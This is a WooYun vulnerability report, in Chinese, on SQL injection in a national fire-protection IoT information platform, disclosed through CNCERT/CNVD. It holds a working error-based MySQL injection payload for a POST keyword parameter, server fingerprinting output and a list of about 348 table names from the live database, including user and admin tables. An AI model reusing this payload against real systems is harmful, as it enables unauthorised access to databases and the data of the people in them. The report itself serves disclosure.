当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0157381

漏洞标题:全国消防物联网信息管理平台sql注入

相关厂商:全国消防物联网信息中心

漏洞作者: 保护伞

提交时间:2015-12-03 00:56

修复时间:2016-01-17 17:24

公开时间:2016-01-17 17:24

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:12

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-12-03: 细节已通知厂商并且等待厂商处理中
2015-12-03: 厂商已经确认,细节仅向厂商公开
2015-12-13: 细节向核心白帽子及相关领域专家公开
2015-12-23: 细节向普通白帽子公开
2016-01-02: 细节向实习白帽子公开
2016-01-17: 细节向公众公开

简要描述:

RT

详细说明:

全国消防物联网信息管理平台
注入点:http://**.**.**.**/xxpt/?m=search (POST)
keyword=%E4%B8%80


Parameter: keyword (POST)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: keyword=%E4%B8%80%' AND (SELECT 6920 FROM(SELECT COUNT(*),CONCAT(0x71707a6b71,(SELECT (CASE WHEN (6920=6920) THEN 1 ELSE 0 END)),0x7171707671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='
Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
---
web server operating system: Windows 2003 or XP
web application technology: PHP 5.2.10, ASP.NET, Microsoft IIS 6.0
back-end DBMS: MySQL 5.0
available databases [2]:
[*] db_cfs119com
[*] information_schema
Database: db_cfs119com
[348 tables]
+--------------------------+
| bjdc_article |
| bjdc_calllist |
| bjdc_comment |
| bjdc_download |
| bjdc_flash |
| bjdc_flash_group |
| bjdc_guestbook |
| bjdc_jobs |
| bjdc_jobs_resume |
| bjdc_linkers |
| bjdc_list |
| bjdc_mapshow |
| bjdc_menu |
| bjdc_models_reg |
| bjdc_models_set |
| bjdc_order |
| bjdc_picture |
| bjdc_poll |
| bjdc_poll_category |
| bjdc_product |
| bjdc_product_order |
| bjdc_user |
| bjdc_video |
| bjhd_article |
| bjhd_calllist |
| bjhd_comment |
| bjhd_download |
| bjhd_flash |
| bjhd_flash_group |
| bjhd_guestbook |
| bjhd_jobs |
| bjhd_jobs_resume |
| bjhd_linkers |
| bjhd_list |
| bjhd_mapshow |
| bjhd_menu |
| bjhd_models_reg |
| bjhd_models_set |
| bjhd_order |
| bjhd_picture |
| bjhd_poll |
| bjhd_poll_category |
| bjhd_product |
| bjhd_product_order |
| bjhd_user |
| bjhd_video |
| bjkjdx_article |
| bjkjdx_calllist |
| bjkjdx_comment |
| bjkjdx_download |
| bjkjdx_flash |
| bjkjdx_flash_group |
| bjkjdx_guestbook |
| bjkjdx_jobs |
| bjkjdx_jobs_resume |
| bjkjdx_linkers |
| bjkjdx_list |
| bjkjdx_mapshow |
| bjkjdx_menu |
| bjkjdx_models_reg |
| bjkjdx_models_set |
| bjkjdx_order |
| bjkjdx_picture |
| bjkjdx_poll |
| bjkjdx_poll_category |
| bjkjdx_product |
| bjkjdx_product_order |
| bjkjdx_user |
| bjkjdx_video |
| bjsjs_article |
| bjsjs_calllist |
| bjsjs_comment |
| bjsjs_download |
| bjsjs_flash |
| bjsjs_flash_group |
| bjsjs_guestbook |
| bjsjs_jobs |
| bjsjs_jobs_resume |
| bjsjs_linkers |
| bjsjs_list |
| bjsjs_mapshow |
| bjsjs_menu |
| bjsjs_models_reg |
| bjsjs_models_set |
| bjsjs_order |
| bjsjs_picture |
| bjsjs_poll |
| bjsjs_poll_category |
| bjsjs_product |
| bjsjs_product_order |
| bjsjs_user |
| bjsjs_video |
| bjxc_article |
| bjxc_calllist |
| bjxc_comment |
| bjxc_download |
| bjxc_flash |
| bjxc_flash_group |
| bjxc_guestbook |
| bjxc_jobs |
| bjxc_jobs_resume |
| bjxc_linkers |
| bjxc_list |
| bjxc_mapshow |
| bjxc_menu |
| bjxc_models_reg |
| bjxc_models_set |
| bjxc_order |
| bjxc_picture |
| bjxc_poll |
| bjxc_poll_category |
| bjxc_product |
| bjxc_product_order |
| bjxc_user |
| bjxc_video |
| bjxf_article |
| bjxf_calllist |
| bjxf_comment |
| bjxf_download |
| bjxf_flash |
| bjxf_flash_group |
| bjxf_guestbook |
| bjxf_jobs |
| bjxf_jobs_resume |
| bjxf_linkers |
| bjxf_list |
| bjxf_mapshow |
| bjxf_menu |
| bjxf_models_reg |
| bjxf_models_set |
| bjxf_order |
| bjxf_picture |
| bjxf_poll |
| bjxf_poll_category |
| bjxf_product |
| bjxf_product_order |
| bjxf_user |
| bjxf_video |
| bjxfwb_article |
| bjxfwb_calllist |
| bjxfwb_comment |
| bjxfwb_download |
| bjxfwb_flash |
| bjxfwb_flash_group |
| bjxfwb_guestbook |
| bjxfwb_jobs |
| bjxfwb_jobs_resume |
| bjxfwb_linkers |
| bjxfwb_list |
| bjxfwb_mapshow |
| bjxfwb_menu |
| bjxfwb_models_reg |
| bjxfwb_models_set |
| bjxfwb_order |
| bjxfwb_picture |
| bjxfwb_poll |
| bjxfwb_poll_category |
| bjxfwb_product |
| bjxfwb_product_order |
| bjxfwb_user |
| bjxfwb_video |
| cpsz |
| cx_admin_nav |
| cx_guestbook |
| cx_guestbook1 |
| cx_info |
| cx_info11 |
| cx_job |
| cx_link |
| cx_link2 |
| cx_mima |
| cx_netedit |
| cx_news |
| cx_order |
| cx_product |
| cx_product1 |
| cx_product2 |
| cx_product3 |
| cx_qikan |
| cx_qtlb |
| cx_rc |
| cx_user |
| dlxf_article |
| dlxf_calllist |
| dlxf_comment |
| dlxf_download |
| dlxf_flash |
| dlxf_flash_group |
| dlxf_guestbook |
| dlxf_jobs |
| dlxf_jobs_resume |
| dlxf_linkers |
| dlxf_list |
| dlxf_mapshow |
| dlxf_menu |
| dlxf_models_reg |
| dlxf_models_set |
| dlxf_order |
| dlxf_picture |
| dlxf_poll |
| dlxf_poll_category |
| dlxf_product |
| dlxf_product_order |
| dlxf_user |
| dlxf_video |
| fjxx |
| fjxxxx |
| hlbexf_article |
| hlbexf_calllist |
| hlbexf_comment |
| hlbexf_download |
| hlbexf_flash |
| hlbexf_flash_group |
| hlbexf_guestbook |
| hlbexf_jobs |
| hlbexf_jobs_resume |
| hlbexf_linkers |
| hlbexf_list |
| hlbexf_mapshow |
| hlbexf_menu |
| hlbexf_models_reg |
| hlbexf_models_set |
| hlbexf_order |
| hlbexf_picture |
| hlbexf_poll |
| hlbexf_poll_category |
| hlbexf_product |
| hlbexf_product_order |
| hlbexf_user |
| hlbexf_video |
| huiyuan |
| hypt_article |
| hypt_calllist |
| hypt_comment |
| hypt_download |
| hypt_flash |
| hypt_flash_group |
| hypt_guestbook |
| hypt_jobs |
| hypt_jobs_resume |
| hypt_linkers |
| hypt_list |
| hypt_mapshow |
| hypt_menu |
| hypt_models_reg |
| hypt_models_set |
| hypt_order |
| hypt_picture |
| hypt_poll |
| hypt_poll_category |
| hypt_product |
| tjxf_models_reg |
| tjxf_models_set |
| tjxf_order |
| tjxf_picture |
| tjxf_poll |
| tjxf_poll_category |
| tjxf_product |
| tjxf_product_order |
| tjxf_user |
| tjxf_video |
| tpgl |
| tvmenu |
| tvmenu1 |
| tvmenu2 |
| tvmenu3 |
| wbarticle |
| wbcalllist |
| wbcomment |
| wbdownload |
| wbflash |
| wbflash_group |
| wbguestbook |
| wbjobs |
| wbjobs_resume |
| wblinkers |
| wblist |
| wbmapshow |
| wbmenu |
| wbmodels_reg |
| wbmodels_set |
| wborder |
| wbpicture |
| wbpoll |
| wbpoll_category |
| wbproduct |
| wbproduct_order |
| wbuser |
| wbvideo |
| wp_cfscommentmeta |
| wp_cfscomments |
| wp_cfsdownloads |
| wp_cfslinks |
| wp_cfsoptions |
| wp_cfspostmeta |
| wp_cfsposts |
| wp_cfsterm_relationships |
| wp_cfsterm_taxonomy |
| wp_cfsterms |
| wp_cfsusermeta |
| wp_cfsusers |
| wzxx |
| xxpt_article |
| xxpt_calllist |
| xxpt_comment |
| xxpt_download |
| xxpt_flash |
| xxpt_flash_group |
| xxpt_guestbook |
| xxpt_jobs |
| xxpt_jobs_resume |
| xxpt_linkers |
| xxpt_list |
| xxpt_mapshow |
| xxpt_menu |
| xxpt_models_reg |
| xxpt_models_set |
| xxpt_order |
| xxpt_picture |
| xxpt_poll |
| xxpt_poll_category |
| xxpt_product |
| xxpt_product_order |
| xxpt_user |
| xxpt_video |
| zhtj_article |
| zhtj_calllist |
| zhtj_comment |
| zhtj_download |
| zhtj_flash |
| zhtj_flash_group |
| zhtj_guestbook |
| zhtj_jobs |
| zhtj_jobs_resume |
| zhtj_linkers |
| zhtj_list |
| zhtj_mapshow |
| zhtj_menu |
| zhtj_models_reg |
| zhtj_models_set |
| zhtj_order |
| zhtj_picture |
| zhtj_poll |
| zhtj_poll_category |
| zhtj_product |
| zhtj_product_order |
| zhtj_user |
| zhtj_video |
+--------------------------+

漏洞证明:

QQ图片20151201174941.png

修复方案:

RT

版权声明:转载请注明来源 保护伞@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:9

确认时间:2015-12-03 17:23

厂商回复:

CNVD确认所述情况,已经由CNVD通过网站公开联系方式向网站管理单位通报。

最新状态:

暂无